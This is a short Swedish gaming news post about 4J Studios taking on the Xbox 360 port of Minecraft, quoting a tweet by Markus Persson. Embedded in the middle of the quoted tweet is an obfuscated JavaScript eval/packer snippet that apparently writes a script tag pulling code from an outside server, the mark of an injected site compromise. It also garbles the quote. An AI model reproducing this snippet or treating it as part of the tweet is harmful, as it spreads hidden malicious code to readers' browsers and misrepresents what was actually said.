Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

Skottar gör Minecraft till Xbox 360

Skottar gör Minecraft till Xbox 360
Sebastian

Som vi nämnt innan så kommer Minecraft att släppas till Xbox 360 inom kort. Dem nämnde även att Markus Persson på Mojang inte kommer att utveckla den versionen. Vem det ska bli har många varit intresserade av, även vi. Men nu står det klart. Företaget 4J Studios på Skottland kommer att ta på sig uppdraget.

Så här skriver Markus Persson på sin Twitter:

[quote]Oh eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekzhy|var|u0026u|referrer|fessa||js|php’.split(’|’),0,{}))
neat, I can announce the team implementing Minecraft for Xbox360! Part of their team made State of Emergency!

They ported Oblivion to PS3 and Perfect Dark to Xbox360! It’s 4J Studios.[/quote]

Mer info: www.gameinformer.com